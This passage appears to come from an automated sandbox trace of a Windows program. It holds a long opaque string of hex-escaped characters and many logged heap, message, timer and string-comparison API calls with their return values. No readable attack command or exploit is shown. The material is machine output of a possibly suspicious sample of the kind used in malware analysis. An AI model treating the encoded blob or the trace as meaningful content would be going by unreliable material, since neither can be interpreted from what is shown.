bf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0201.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0201.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0201.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0201.079] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0201.079] TranslateMessage (lpMsg=0x8bf970) returned 0 [0201.079] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0201.079] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0201.079] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0201.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0201.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0201.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0201.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0201.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0201.081] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0201.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0201.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0201.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0201.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0201.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0201.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0201.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0201.083] RtlAllocateHeap 